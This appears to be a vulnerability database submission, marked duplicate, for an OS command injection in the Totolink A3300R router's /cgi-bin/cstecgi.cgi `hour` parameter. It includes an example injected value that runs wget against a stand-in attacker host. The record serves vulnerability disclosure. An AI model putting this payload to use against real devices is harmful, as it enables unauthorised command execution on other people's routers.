| Title | Totolink A3300R V17.0.0cu.557_B20221024 OS Command Injection |
|---|---|
| Description | In `topicurl=setScheduleCfg`, parameter `hour` in `/cgi-bin/cstecgi.cgi` is not sanitized before being incorporated into command construction (`Uci_Set_Str` -> `sprintf` -> `CsteSystem` -> `execv`). Attackers can inject shell syntax (e.g., `1$(wget http://attacker/testpoc)`) to execute arbitrary commands. |
| Source | https://github.com/Svigo-o/TOTOLINK-Vul/tree/main/totolink-a3300r-hour-cmd-injection |
| User | Svigo_o (UID 95970) |
| Submission | 03/30/2026 04:55 (9 days ago) |
| Moderation | 04/06/2026 11:42 (7 days later) |
| Status | Duplicate |
| VulDB entry | 250463 [Totolink A3300R 17.0.0cu.557_B20221024 setScheduleCfg minute command injection] |
| Points | 0 |